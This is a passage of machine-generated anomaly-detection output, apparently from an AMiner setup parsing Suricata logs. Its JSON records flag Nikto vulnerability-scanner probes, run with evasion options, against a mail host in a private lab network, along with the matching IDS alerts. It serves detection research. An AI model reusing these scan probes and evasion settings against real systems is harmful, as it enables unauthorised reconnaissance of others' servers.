"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80", "/parser/model/time": 1583349514.272047, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46884, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.show", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.272253, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":477548807594957,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46884, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":477548807594957,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 477548807594957, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80", "/parser/model/time": 1583349514.274557, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46886, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.274771, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46886, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1119818217040458, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80", "/parser/model/time": 1583349514.276675, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46888, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.chl+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.276861, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":287028353316318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
